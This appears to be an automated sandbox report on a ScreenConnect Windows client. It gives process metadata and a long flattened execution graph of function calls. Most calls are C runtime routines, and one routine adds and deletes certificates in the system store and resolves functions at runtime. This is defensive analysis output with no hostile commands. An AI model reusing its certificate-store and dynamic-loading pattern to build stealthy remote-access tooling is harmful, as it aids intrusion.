                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "be4104e4-6414-4af7-ae9c-6dc20c5434ce" "System"
                                                                                                                                                                                                                                                                        Imagebase:0xdc0000
                                                                                                                                                                                                                                                                        File size:601'376 bytes
                                                                                                                                                                                                                                                                        MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                          Execution Coverage:2.2%
                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                          Signature Coverage:3.8%
                                                                                                                                                                                                                                                                          Total number of Nodes:1465
                                                                                                                                                                                                                                                                          Total number of Limit Nodes:4
5806 834869 _free 15 API calls 5804->5806 5805->5804 5807 834869 _free 15 API calls 5805->5807 5808 833dc4 5806->5808 5807->5804 5809 834869 _free 15 API calls 5808->5809 5810 833dd7 5809->5810 5811 834869 _free 15 API calls 5810->5811 5812 833de8 5811->5812 5813 834869 _free 15 API calls 5812->5813 5814 833df9 5813->5814 6136 83430f 6137 83431a 6136->6137 6138 83432a 6136->6138 6142 834330 6137->6142 6141 834869 _free 15 API calls 6141->6138 6143 834343 6142->6143 6144 834349 6142->6144 6145 834869 _free 15 API calls 6143->6145 6146 834869 _free 15 API calls 6144->6146 6145->6144 6147 834355 6146->6147 6148 834869 _free 15 API calls 6147->6148 6149 834360 6148->6149 6150 834869 _free 15 API calls 6149->6150 6151 83436b 6150->6151 6152 834869 _free 15 API calls 6151->6152 6153 834376 6152->6153 6154 834869 _free 15 API calls 6153->6154 6155 834381 6154->6155 6156 834869 _free 15 API calls 6155->6156 6157 83438c 6156->6157 6158 834869 _free 15 API calls 6157->6158 6159 834397 6158->6159 6160 834869 _free 15 API calls 6159->6160 6161 8343a2 6160->6161 6162 834869 _free 15 API calls 6161->6162 6163 8343b0 6162->6163 6168 8341f6 6163->6168 6174 834102 6168->6174 6170 83421a 6171 834246 6170->6171 6187 834163 6171->6187 6173 83426a 6173->6141 6175 83410e ___scrt_is_nonwritable_in_current_image 6174->6175 6182 8356e2 EnterCriticalSection 6175->6182 6178 834118 6180 834869 _free 15 API calls 6178->6180 6181 834142 6178->6181 6179 83414f _abort 6179->6170 6180->6181 6183 834157 6181->6183 6182->6178 6186 83572a LeaveCriticalSection 6183->6186 6185 834161 6185->6179 6186->6185 6188 83416f ___scrt_is_nonwritable_in_current_image 6187->6188 6195 8356e2 EnterCriticalSection 6188->6195 6190 834179 6191 8343d9 _abort 15 API calls 6190->6191 6192 83418c 6191->6192 6196 8341a2 6192->6196 6194 83419a _abort 6194->6173 6195->6190 6199 83572a LeaveCriticalSection 6196->6199 6198 8341ac 6198->6194 6199->6198 5988 8355ce GetCommandLineA GetCommandLineW 5032 83130d 5033 831319 
___scrt_is_nonwritable_in_current_image 5032->5033 5060 83162b 5033->5060 5035 831320 5036 831473 5035->5036 5045 83134a ___scrt_is_nonwritable_in_current_image _abort ___scrt_release_startup_lock 5035->5045 5112 83191f IsProcessorFeaturePresent 5036->5112 5038 83147a 5039 831480 5038->5039 5116 8337e1 5038->5116 5119 833793 5039->5119 5043 831369 5044 8313ea 5068 831a34 5044->5068 5045->5043 5045->5044 5097 8337a9 5045->5097 5052 831405 5103 831a6a GetModuleHandleW 5052->5103 5055 831410 5056 831419 5055->5056 5105 833784 5055->5105 5108 83179c 5056->5108 5061 831634 5060->5061 5122 831bd4 IsProcessorFeaturePresent 5061->5122 5065 831645 5066 831649 5065->5066 5132 831f7d 5065->5132 5066->5035 5192 8320b0 5068->5192 5070 831a47 GetStartupInfoW 5071 8313f0 5070->5071 5072 833457 5071->5072 5194 83522b 5072->5194 5074 8313f8 5077 831000 6 API calls 5074->5077 5075 833460 5075->5074 5198 8355b6 5075->5198 5078 8311e3 Sleep 5077->5078 5079 831096 CryptMsgGetParam 5077->5079 5080 8311f7 5078->5080 5081 831215 CertCloseStore LocalFree LocalFree LocalFree 5078->5081 5082 831162 CryptMsgGetParam 5079->5082 5083 8310bc LocalAlloc 5079->5083 5080->5081 5087 83120a CertDeleteCertificateFromStore 5080->5087 5081->5052 5082->5078 5086 831174 CryptMsgGetParam 5082->5086 5084 8310d7 5083->5084 5085 831156 LocalFree 5083->5085 5088 8310e0 LocalAlloc CryptMsgGetParam 5084->5088 5085->5082 5086->5078 5089 831188 CertFindAttribute CertFindAttribute 5086->5089 5087->5080 5092 831114 CertCreateCertificateContext 5088->5092 5093 83113d LocalFree 5088->5093 5090 8311b1 5089->5090 5091 8311b5 LoadLibraryA GetProcAddress 5089->5091 5090->5078 5090->5091 5091->5078 5094 831133 CertFreeCertificateContext 5092->5094 5095 831126 CertAddCertificateContextToStore 5092->5095 5093->5088 5096 83114d 5093->5096 5094->5093 5095->5094 5096->5085 5098 8337d1 _abort 5097->5098 5098->5044 5099 834424 _abort 33 API calls 5098->5099 5102 833e9a 5099->5102 5100 833f24 _abort 33 API calls 5101 833ec4 
5100->5101 5102->5100 5104 83140c 5103->5104 5104->5038 5104->5055 5686 83355e 5105->5686 5107 83378f 5107->5056 5110 8317a8 ___scrt_uninitialize_crt 5108->5110 5109 831421 5109->5043 5110->5109 5111 831f7d ___scrt_uninitialize_crt 7 API calls 5110->5111 5111->5109 5113 831935 _abort 5112->5113 5114 8319e0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5113->5114 5115 831a24 _abort 5114->5115 5115->5038 5117 83355e _abort 23 API calls 5116->5117 5118 8337f2 5117->5118 5118->5039 5120 83355e _abort 23 API calls 5119->5120 5121 831488 5120->5121 5123 831640 5122->5123 5124 831f5e 5123->5124 5138 8324b1 5124->5138 5128 831f6f 5129 831f7a 5128->5129 5152 8324ed 5128->5152 5129->5065 5131 831f67 5131->5065 5133 831f90 5132->5133 5134 831f86 5132->5134 5133->5066 5135 832496 ___vcrt_uninitialize_ptd 6 API calls 5134->5135 5136 831f8b 5135->5136 5137 8324ed ___vcrt_uninitialize_locks DeleteCriticalSection 5136->5137 5137->5133 5139 8324ba 5138->5139 5141 8324e3 5139->5141 5142 831f63 5139->5142 5156 83271d 5139->5156 5143 8324ed ___vcrt_uninitialize_locks DeleteCriticalSection 5141->5143 5142->5131 5144 832463 5142->5144 5143->5142 5173 83262e 5144->5173 5147 832478 5147->5128 5150 832493 5150->5128 5153 832517 5152->5153 5154 8324f8 5152->5154 5153->5131 5155 832502 DeleteCriticalSection 5154->5155 5155->5153 5155->5155 5161 832543 5156->5161 5159 832740 5159->5139 5160 832755 InitializeCriticalSectionAndSpinCount 5160->5159 5162 832560 5161->5162 5165 832564 5161->5165 5162->5159 5162->5160 5163 8325cc GetProcAddress 5163->5162 5165->5162 5165->5163 5166 8325bd 5165->5166 5168 8325e3 LoadLibraryExW 5165->5168 5166->5163 5167 8325c5 FreeLibrary 5166->5167 5167->5163 5169 8325fa GetLastError 5168->5169 5170 83262a 5168->5170 5169->5170 5171 832605 ___vcrt_InitializeCriticalSectionEx 5169->5171 5170->5165 5171->5170 5172 83261b LoadLibraryExW 5171->5172 5172->5165 5174 832543 ___vcrt_InitializeCriticalSectionEx 5 API calls 5173->5174 5175 832648 
5174->5175 5176 832661 TlsAlloc 5175->5176 5177 83246d 5175->5177 5177->5147 5178 8326df 5177->5178 5179 832543 ___vcrt_InitializeCriticalSectionEx 5 API calls 5178->5179 5180 8326f9 5179->5180 5181 832714 TlsSetValue 5180->5181 5182 832486 5180->5182 5181->5182 5182->5150 5183 832496 5182->5183 5184 8324a0 5183->5184 5185 8324a6 5183->5185 5187 832669 5184->5187 5185->5147 5188 832543 ___vcrt_InitializeCriticalSectionEx 5 API calls 5187->5188 5189 832683 5188->5189 5190 83269b TlsFree 5189->5190 5191 83268f 5189->5191 5190->5191 5191->5185 5193 8320c7 5192->5193 5193->5070 5193->5193 5195 835234 5194->5195 5197 83523d 5194->5197 5201 83512a 5195->5201 5197->5075 5683 83555d 5198->5683 5221 834424 GetLastError 5201->5221 5203 835137 5241 835249 5203->5241 5205 83513f 5250 834ebe 5205->5250 5208 835156 5208->5197 5212 83518c 5214 835194 5212->5214 5215 8351b1 5212->5215 5272 8347f9 5214->5272 5217 8351dd 5215->5217 5218 834869 _free 15 API calls 5215->5218 5220 835199 5217->5220 5281 834d94 5217->5281 5218->5217 5275 834869 5220->5275 5222 834440 5221->5222 5223 83443a 5221->5223 5228 83448f SetLastError 5222->5228 5289 83480c 5222->5289 5284 835904 5223->5284 5227 83445a 5230 834869 _free 15 API calls 5227->5230 5228->5203 5232 834460 5230->5232 5231 83446f 5231->5227 5233 834476 5231->5233 5234 83449b SetLastError 5232->5234 5301 834296 5233->5301 5306 833f24 5234->5306 5239 834869 _free 15 API calls 5240 834488 5239->5240 5240->5228 5240->5234 5242 835255 ___scrt_is_nonwritable_in_current_image 5241->5242 5243 834424 _abort 33 API calls 5242->5243 5245 83525f 5243->5245 5247 833f24 _abort 33 API calls 5245->5247 5248 8352e3 _abort 5245->5248 5249 834869 _free 15 API calls 5245->5249 5542 8356e2 EnterCriticalSection 5245->5542 5543 8352da 5245->5543 5247->5245 5248->5205 5249->5245 5547 833f72 5250->5547 5253 834ef1 5255 834f08 5253->5255 5256 834ef6 GetACP 5253->5256 5254 834edf GetOEMCP 5254->5255 5255->5208 5257 8362ff 5255->5257 5256->5255 5258 83633d 
5257->5258 5263 83630d _abort 5257->5263 5259 8347f9 _free 15 API calls 5258->5259 5261 835167 5259->5261 5260 836328 HeapAlloc 5260->5261 5260->5263 5261->5220 5264 8352eb 5261->5264 5262 836992 _abort 2 API calls 5262->5263 5263->5258 5263->5260 5263->5262 5265 834ebe 35 API calls 5264->5265 5266 83530a 5265->5266 5267 83535b IsValidCodePage 5266->5267 5269 835311 _ValidateLocalCookies 5266->5269 5271 835380 _abort 5266->5271 5268 83536d GetCPInfo 5267->5268 5267->5269 5268->5269 5268->5271 5269->5212 5584 834f96 GetCPInfo 5271->5584 5273 8344a8 _free 15 API calls 5272->5273 5274 8347fe 5273->5274 5274->5220 5276 83489d _free 5275->5276 5277 834874 HeapFree 5275->5277 5276->5208 5277->5276 5278 834889 5277->5278 5279 8347f9 _free 13 API calls 5278->5279 5280 83488f GetLastError 5279->5280 5280->5276 5647 834d51 5281->5647 5283 834db8 5283->5220 5317 835741 5284->5317 5286 83592b 5287 835943 TlsGetValue 5286->5287 5288 835937 _ValidateLocalCookies 5286->5288 5287->5288 5288->5222 5295 834819 _abort 5289->5295 5290 834859 5292 8347f9 _free 14 API calls 5290->5292 5291 834844 HeapAlloc 5293 834452 5291->5293 5291->5295 5292->5293 5293->5227 5296 83595a 5293->5296 5295->5290 5295->5291 5330 836992 5295->5330 5297 835741 _abort 5 API calls 5296->5297 5298 835981 5297->5298 5299 835990 _ValidateLocalCookies 5298->5299 5300 83599c TlsSetValue 5298->5300 5299->5231 5300->5299 5344 83426e 5301->5344 5452 836b14 5306->5452 5309 833f35 5311 833f3e IsProcessorFeaturePresent 5309->5311 5316 833f5c 5309->5316 5312 833f49 5311->5312 5480 834573 5312->5480 5313 833793 _abort 23 API calls 5315 833f66 5313->5315 5316->5313 5318 835771 _abort 5317->5318 5319 83576d 5317->5319 5318->5286 5319->5318 5321 835791 5319->5321 5323 8357dd 5319->5323 5321->5318 5322 83579d GetProcAddress 5321->5322 5322->5318 5324 8357fe LoadLibraryExW 5323->5324 5329 8357f3 5323->5329 5325 835833 5324->5325 5326 83581b GetLastError 5324->5326 5328 83584a FreeLibrary 5325->5328 5325->5329 5326->5325 5327 
835826 LoadLibraryExW 5326->5327 5327->5325 5328->5329 5329->5319 5333 8369d6 5330->5333 5332 8369a8 _ValidateLocalCookies 5332->5295 5334 8369e2 ___scrt_is_nonwritable_in_current_image 5333->5334 5339 8356e2 EnterCriticalSection 5334->5339 5336 8369ed 5340 836a1f 5336->5340 5338 836a14 _abort 5338->5332 5339->5336 5343 83572a LeaveCriticalSection 5340->5343 5342 836a26 5342->5338 5343->5342 5350 8341ae 5344->5350 5346 834292 5347 83421e 5346->5347 5361 8340b2 5347->5361 5349 834242 5349->5239 5351 8341ba ___scrt_is_nonwritable_in_current_image 5350->5351 5356 8356e2 EnterCriticalSection 5351->5356 5353 8341c4 5357 8341ea 5353->5357 5355 8341e2 _abort 5355->5346 5356->5353 5360 83572a LeaveCriticalSection 5357->5360 5359 8341f4 5359->5355 5360->5359 5362 8340be ___scrt_is_nonwritable_in_current_image 5361->5362 5369 8356e2 EnterCriticalSection 5362->5369 5364 8340c8 5370 8343d9 5364->5370 5366 8340e0 5374 8340f6 5366->5374 5368 8340ee _abort 5368->5349 5369->5364 5371 8343e8 __fassign 5370->5371 5372 83440f __fassign 5370->5372 5371->5372 5377 836507 5371->5377 5372->5366 5451 83572a LeaveCriticalSection 5374->5451 5376 834100 5376->5368 5378 836587 5377->5378 5383 83651d 5377->5383 5379 8365d5 5378->5379 5381 834869 _free 15 API calls 5378->5381 5445 83667a 5379->5445 5384 8365a9 5381->5384 5382 836550 5385 836572 5382->5385 5393 834869 _free 15 API calls 5382->5393 5383->5378 5383->5382 5388 834869 _free 15 API calls 5383->5388 5386 834869 _free 15 API calls 5384->5386 5387 834869 _free 15 API calls 5385->5387 5389 8365bc 5386->5389 5390 83657c 5387->5390 5392 836545 5388->5392 5394 834869 _free 15 API calls 5389->5394 5395 834869 _free 15 API calls 5390->5395 5391 836643 5396 834869 _free 15 API calls 5391->5396 5405 836078 5392->5405 5398 836567 5393->5398 5399 8365ca 5394->5399 5395->5378 5400 836649 5396->5400 5433 836176 5398->5433 5403 834869 _free 15 API calls 5399->5403 5400->5372 5401 8365e3 5401->5391 5404 834869 15 API calls _free 5401->5404 5403->5379 
5404->5401 5406 836089 5405->5406 5432 836172 5405->5432 5407 83609a 5406->5407 5408 834869 _free 15 API calls 5406->5408 5409 8360ac 5407->5409 5411 834869 _free 15 API calls 5407->5411 5408->5407 5410 8360be 5409->5410 5412 834869 _free 15 API calls 5409->5412 5413 8360d0 5410->5413 5414 834869 _free 15 API calls 5410->5414 5411->5409 5412->5410 5415 834869 _free 15 API calls 5413->5415 5417 8360e2 5413->5417 5414->5413 5415->5417 5416 836106 5420 836118 5416->5420 5422 834869 _free 15 API calls 5416->5422 5418 834869 _free 15 API calls 5417->5418 5421 8360f4 5417->5421 5418->5421 5419 834869 _free 15 API calls 5419->5416 5423 83612a 5420->5423 5424 834869 _free 15 API calls 5420->5424 5421->5416 5421->5419 5422->5420 5425 83613c 5423->5425 5427 834869 _free 15 API calls 5423->5427 5424->5423 5426 83614e 5425->5426 5428 834869 _free 15 API calls 5425->5428 5429 836160 5426->5429 5430 834869 _free 15 API calls 5426->5430 5427->5425 5428->5426 5431 834869 _free 15 API calls 5429->5431 5429->5432 5430->5429 5431->5432 5432->5382 5434 836183 5433->5434 5444 8361db 5433->5444 5435 834869 _free 15 API calls 5434->5435 5437 836193 5434->5437 5435->5437 5436 8361a5 5439 8361b7 5436->5439 5440 834869 _free 15 API calls 5436->5440 5437->5436 5438 834869 _free 15 API calls 5437->5438 5438->5436 5441 8361c9 5439->5441 5442 834869 _free 15 API calls 5439->5442 5440->5439 5443 834869 _free 15 API calls 5441->5443 5441->5444 5442->5441 5443->5444 5444->5385 5446 8366a5 5445->5446 5447 836687 5445->5447 5446->5401 5447->5446 5448 83621b __fassign 15 API calls 5447->5448 5449 83669f 5448->5449 5450 834869 _free 15 API calls 5449->5450 5450->5446 5451->5376 5484 836a82 5452->5484 5455 836b6f 5456 836b7b _abort 5455->5456 5461 836ba8 _abort 5456->5461 5462 836ba2 _abort 5456->5462 5498 8344a8 GetLastError 5456->5498 5458 836bf4 5459 8347f9 _free 15 API calls 5458->5459 5460 836bf9 5459->5460 5517 83473d 5460->5517 5466 836c20 5461->5466 5520 8356e2 EnterCriticalSection 5461->5520 
5462->5458 5462->5461 5464 836bd7 _abort 5462->5464 5464->5309 5468 836c77 5466->5468 5470 836c7f 5466->5470 5477 836caa 5466->5477 5521 83572a LeaveCriticalSection 5466->5521 5472 833793 _abort 23 API calls 5468->5472 5470->5477 5522 836b66 5470->5522 5472->5470 5474 834424 _abort 33 API calls 5478 836d0d 5474->5478 5476 836b66 _abort 33 API calls 5476->5477 5525 836d2f 5477->5525 5478->5464 5479 834424 _abort 33 API calls 5478->5479 5479->5464 5481 83458f _abort 5480->5481 5482 8345bb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5481->5482 5483 83468c _abort _ValidateLocalCookies 5482->5483 5483->5316 5487 836a28 5484->5487 5486 833f29 5486->5309 5486->5455 5488 836a34 ___scrt_is_nonwritable_in_current_image 5487->5488 5493 8356e2 EnterCriticalSection 5488->5493 5490 836a42 5494 836a76 5490->5494 5492 836a69 _abort 5492->5486 5493->5490 5497 83572a LeaveCriticalSection 5494->5497 5496 836a80 5496->5492 5497->5496 5499 8344c1 5498->5499 5500 8344c7 5498->5500 5501 835904 _abort 6 API calls 5499->5501 5502 83480c _abort 12 API calls 5500->5502 5504 83451e SetLastError 5500->5504 5501->5500 5503 8344d9 5502->5503 5505 8344e1 5503->5505 5507 83595a _abort 6 API calls 5503->5507 5506 834527 5504->5506 5508 834869 _free 12 API calls 5505->5508 5506->5462 5509 8344f6 5507->5509 5510 8344e7 5508->5510 5509->5505 5511 8344fd 5509->5511 5513 834515 SetLastError 5510->5513 5512 834296 _abort 12 API calls 5511->5512 5514 834508 5512->5514 5513->5506 5515 834869 _free 12 API calls 5514->5515 5516 83450e 5515->5516 5516->5504 5516->5513 5529 8346c2 5517->5529 5519 834749 5519->5464 5520->5466 5521->5468 5523 834424 _abort 33 API calls 5522->5523 5524 836b6b 5523->5524 5524->5476 5526 836d35 5525->5526 5528 836cfe 5525->5528 5541 83572a LeaveCriticalSection 5526->5541 5528->5464 5528->5474 5528->5478 5530 8344a8 _free 15 API calls 5529->5530 5531 8346d8 5530->5531 5532 8346e6 _ValidateLocalCookies 5531->5532 5537 83474d IsProcessorFeaturePresent 
5531->5537 5532->5519 5534 83473c 5535 8346c2 _abort 21 API calls 5534->5535 5536 834749 5535->5536 5536->5519 5538 834758 5537->5538 5539 834573 _abort 3 API calls 5538->5539 5540 83476d GetCurrentProcess TerminateProcess 5539->5540 5540->5534 5541->5528 5542->5245 5546 83572a LeaveCriticalSection 5543->5546 5545 8352e1 5545->5245 5546->5545 5548 833f8f 5547->5548 5554 833f85 5547->5554 5549 834424 _abort 33 API calls 5548->5549 5548->5554 5550 833fb0 5549->5550 5555 8372d1 5550->5555 5554->5253 5554->5254 5556 8372e4 5555->5556 5557 833fc9 5555->5557 5556->5557 5563 836754 5556->5563 5559 8372fe 5557->5559 5560 837311 5559->5560 5561 837326 5559->5561 5560->5561 5562 835249 __fassign 33 API calls 5560->5562 5561->5554 5562->5561 5564 836760 ___scrt_is_nonwritable_in_current_image 5563->5564 5565 834424 _abort 33 API calls 5564->5565 5566 836769 5565->5566 5570 8367b7 _abort 5566->5570 5575 8356e2 EnterCriticalSection 5566->5575 5568 836787 5576 8367cb 5568->5576 5570->5557 5574 833f24 _abort 33 API calls 5574->5570 5575->5568 5577 83679b 5576->5577 5578 8367d9 __fassign 5576->5578 5580 8367ba 5577->5580 5578->5577 5579 836507 __fassign 15 API calls 5578->5579 5579->5577 5583 83572a LeaveCriticalSection 5580->5583 5582 8367ae 5582->5570 5582->5574 5583->5582 5588 834fd0 5584->5588 5591 83507a _ValidateLocalCookies 5584->5591 5586 835031 5604 837cd1 5586->5604 5592 83634d 5588->5592 5590 837cd1 38 API calls 5590->5591 5591->5269 5593 833f72 __fassign 33 API calls 5592->5593 5594 83636d MultiByteToWideChar 5593->5594 5596 8363ab 5594->5596 5602 836443 _ValidateLocalCookies 5594->5602 5597 8363cc _abort __alloca_probe_16 5596->5597 5599 8362ff 16 API calls 5596->5599 5598 83643d 5597->5598 5601 836411 MultiByteToWideChar 5597->5601 5609 83646a 5598->5609 5599->5597 5601->5598 5603 83642d GetStringTypeW 5601->5603 5602->5586 5603->5598 5605 833f72 __fassign 33 API calls 5604->5605 5606 837ce4 5605->5606 5613 837ab4 5606->5613 5608 835052 5608->5590 5610 836476 
5609->5610 5611 836487 5609->5611 5610->5611 5612 834869 _free 15 API calls 5610->5612 5611->5602 5612->5611 5614 837acf 5613->5614 5615 837af5 MultiByteToWideChar 5614->5615 5616 837b1f 5615->5616 5618 837ca9 _ValidateLocalCookies 5615->5618 5617 837b40 __alloca_probe_16 5616->5617 5620 8362ff 16 API calls 5616->5620 5619 837b89 MultiByteToWideChar 5617->5619 5622 837bf5 5617->5622 5618->5608 5621 837ba2 5619->5621 5619->5622 5620->5617 5638 835a15 5621->5638 5624 83646a __freea 15 API calls 5622->5624 5624->5618 5625 837bb9 5625->5622 5626 837c04 5625->5626 5627 837bcc 5625->5627 5628 8362ff 16 API calls 5626->5628 5632 837c25 __alloca_probe_16 5626->5632 5627->5622 5629 835a15 6 API calls 5627->5629 5628->5632 5629->5622 5630 837c9a 5631 83646a __freea 15 API calls 5630->5631 5631->5622 5632->5630 5633 835a15 6 API calls 5632->5633 5634 837c79 5633->5634 5634->5630 5635 837c88 WideCharToMultiByte 5634->5635 5635->5630 5636 837cc8 5635->5636 5637 83646a __freea 15 API calls 5636->5637 5637->5622 5639 835741 _abort 5 API calls 5638->5639 5640 835a3c 5639->5640 5643 835a45 _ValidateLocalCookies 5640->5643 5644 835a9d 5640->5644 5642 835a85 LCMapStringW 5642->5643 5643->5625 5645 835741 _abort 5 API calls 5644->5645 5646 835ac4 _ValidateLocalCookies 5645->5646 5646->5642 5648 834d5d ___scrt_is_nonwritable_in_current_image 5647->5648 5655 8356e2 EnterCriticalSection 5648->5655 5650 834d67 5656 834dbc 5650->5656 5654 834d80 _abort 5654->5283 5655->5650 5668 8354dc 5656->5668 5658 834e0a 5659 8354dc 21 API calls 5658->5659 5660 834e26 5659->5660 5661 8354dc 21 API calls 5660->5661 5662 834e44 5661->5662 5663 834d74 5662->5663 5664 834869 _free 15 API calls 5662->5664 5665 834d88 5663->5665 5664->5663 5682 83572a LeaveCriticalSection 5665->5682 5667 834d92 5667->5654 5669 8354ed 5668->5669 5673 8354e9 5668->5673 5670 8354f4 5669->5670 5675 835507 _abort 5669->5675 5671 8347f9 _free 15 API calls 5670->5671 5672 8354f9 5671->5672 5674 83473d _abort 21 API calls 5672->5674 
5673->5658 5674->5673 5675->5673 5676 835535 5675->5676 5677 83553e 5675->5677 5678 8347f9 _free 15 API calls 5676->5678 5677->5673 5679 8347f9 _free 15 API calls 5677->5679 5680 83553a 5678->5680 5679->5680 5681 83473d _abort 21 API calls 5680->5681 5681->5673 5682->5667 5684 833f72 __fassign 33 API calls 5683->5684 5685 835571 5684->5685 5685->5075 5687 83356a _abort 5686->5687 5688 833582 5687->5688 5701 8336b8 GetModuleHandleW 5687->5701 5708 8356e2 EnterCriticalSection 5688->5708 5695 83358a 5697 8335ff _abort 5695->5697 5709 833c97 5695->5709 5696 833671 _abort 5696->5107 5712 833668 5697->5712 5702 833576 5701->5702 5702->5688 5703 8336fc GetModuleHandleExW 5702->5703 5704 833726 GetProcAddress 5703->5704 5705 83373b 5703->5705 5704->5705 5706 833758 _ValidateLocalCookies 5705->5706 5707 83374f FreeLibrary 5705->5707 5706->5688 5707->5706 5708->5695 5723 8339d0 5709->5723 5743 83572a LeaveCriticalSection 5712->5743 5714 833641 5714->5696 5715 833677 5714->5715 5744 835b1f 5715->5744 5717 833681 5718 8336a5 5717->5718 5719 833685 GetPEB 5717->5719 5721 8336fc _abort 3 API calls 5718->5721 5719->5718 5720 833695 GetCurrentProcess TerminateProcess 5719->5720 5720->5718 5722 8336ad ExitProcess 5721->5722 5726 83397f 5723->5726 5725 8339f4 5725->5697 5727 83398b ___scrt_is_nonwritable_in_current_image 5726->5727 5734 8356e2 EnterCriticalSection 5727->5734 5729 833999 5735 833a20 5729->5735 5731 8339a6 5739 8339c4 5731->5739 5733 8339b7 _abort 5733->5725 5734->5729 5736 833a40 _ValidateLocalCookies 5735->5736 5737 833a48 5735->5737 5736->5731 5737->5736 5738 834869 _free 15 API calls 5737->5738 5738->5736 5742 83572a LeaveCriticalSection 5739->5742 5741 8339ce 5741->5733 5742->5741 5743->5714 5745 835b44 5744->5745 5747 835b3a _ValidateLocalCookies 5744->5747 5746 835741 _abort 5 API calls 5745->5746 5746->5747 5747->5717 6703 83324d 6704 83522b 46 API calls 6703->6704 6705 83325f 6704->6705 6714 83561e GetEnvironmentStringsW 6705->6714 6708 83326a 6710 834869 
_free 15 API calls 6708->6710 6711 83329f 6710->6711 6712 833275 6713 834869 _free 15 API calls 6712->6713 6713->6708 6715 835635 6714->6715 6725 835688 6714->6725 6718 83563b WideCharToMultiByte 6715->6718 6716 835691 FreeEnvironmentStringsW 6717 833264 6716->6717 6717->6708 6726 8332a5 6717->6726 6719 835657 6718->6719 6718->6725 6720 8362ff 16 API calls 6719->6720 6721 83565d 6720->6721 6722 83567a 6721->6722 6723 835664 WideCharToMultiByte 6721->6723 6724 834869 _free 15 API calls 6722->6724 6723->6722 6724->6725 6725->6716 6725->6717 6727 8332ba 6726->6727 6728 83480c _abort 15 API calls 6727->6728 6738 8332e1 6728->6738 6729 833345 6730 834869 _free 15 API calls 6729->6730 6731 83335f 6730->6731 6731->6712 6732 83480c _abort 15 API calls 6732->6738 6733 833347 6735 833376 15 API calls 6733->6735 6736 83334d 6735->6736 6739 834869 _free 15 API calls 6736->6739 6737 833369 6740 83474d _abort 6 API calls 6737->6740 6738->6729 6738->6732 6738->6733 6738->6737 6741 834869 _free 15 API calls 6738->6741 6743 833eca 6738->6743 6739->6729 6742 833375 6740->6742 6741->6738 6744 833ed7 6743->6744 6745 833ee5 6743->6745 6744->6745 6750 833efc 6744->6750 6746 8347f9 _free 15 API calls 6745->6746 6747 833eed 6746->6747 6748 83473d _abort 21 API calls 6747->6748 6749 833ef7 6748->6749 6749->6738 6750->6749 6751 8347f9 _free 15 API calls 6750->6751 6751->6747 5815 836893 GetProcessHeap 6752 832f53 6753 832f62 6752->6753 6754 832f7e 6752->6754 6753->6754 6756 832f68 6753->6756 6755 83522b 46 API calls 6754->6755 6757 832f85 GetModuleFileNameA 6755->6757 6758 8347f9 _free 15 API calls 6756->6758 6760 832fa9 6757->6760 6759 832f6d 6758->6759 6761 83473d _abort 21 API calls 6759->6761 6775 833077 6760->6775 6762 832f77 6761->6762 6765 8331ec 15 API calls 6766 832fd3 6765->6766 6767 832fe8 6766->6767 6768 832fdc 6766->6768 6769 833077 33 API calls 6767->6769 6770 8347f9 _free 15 API calls 6768->6770 6772 832ffe 6769->6772 6774 832fe1 6770->6774 6771 834869 _free 15 API calls 
6771->6762 6773 834869 _free 15 API calls 6772->6773 6772->6774 6773->6774 6774->6771 6777 83309c 6775->6777 6776 8355b6 33 API calls 6776->6777 6777->6776 6779 8330fc 6777->6779 6778 832fc6 6778->6765 6779->6778 6780 8355b6 33 API calls 6779->6780 6780->6779 6781 837351 6782 83735e 6781->6782 6783 83480c _abort 15 API calls 6782->6783 6784 837378 6783->6784 6785 834869 _free 15 API calls 6784->6785 6786 837384 6785->6786 6787 83480c _abort 15 API calls 6786->6787 6791 8373aa 6786->6791 6789 83739e 6787->6789 6788 8359b3 6 API calls 6788->6791 6790 834869 _free 15 API calls 6789->6790 6790->6791 6791->6788 6792 8373b6 6791->6792 5989 835fd0 5990 835fdc ___scrt_is_nonwritable_in_current_image 5989->5990 6001 8356e2 EnterCriticalSection 5990->6001 5992 835fe3 6002 835c8b 5992->6002 5994 835ff2 5995 836001 5994->5995 6015 835e64 GetStartupInfoW 5994->6015 6026 83601d 5995->6026 5999 836012 _abort 6001->5992 6003 835c97 ___scrt_is_nonwritable_in_current_image 6002->6003 6004 835ca4 6003->6004 6005 835cbb 6003->6005 6006 8347f9 _free 15 API calls 6004->6006 6029 8356e2 EnterCriticalSection 6005->6029 6008 835ca9 6006->6008 6009 83473d _abort 21 API calls 6008->6009 6011 835cb3 _abort 6009->6011 6010 835cf3 6037 835d1a 6010->6037 6011->5994 6014 835cc7 6014->6010 6030 835bdc 6014->6030 6016 835e81 6015->6016 6017 835f13 6015->6017 6016->6017 6018 835c8b 22 API calls 6016->6018 6021 835f1a 6017->6021 6019 835eaa 6018->6019 6019->6017 6020 835ed8 GetFileType 6019->6020 6020->6019 6022 835f21 6021->6022 6023 835f64 GetStdHandle 6022->6023 6024 835fcc 6022->6024 6025 835f77 GetFileType 6022->6025 6023->6022 6024->5995 6025->6022 6041 83572a LeaveCriticalSection 6026->6041 6028 836024 6028->5999 6029->6014 6031 83480c _abort 15 API calls 6030->6031 6032 835bee 6031->6032 6034 8359b3 6 API calls 6032->6034 6036 835bfb 6032->6036 6033 834869 _free 15 API calls 6035 835c4d 6033->6035 6034->6032 6035->6014 6036->6033 6040 83572a LeaveCriticalSection 6037->6040 6039 835d21 
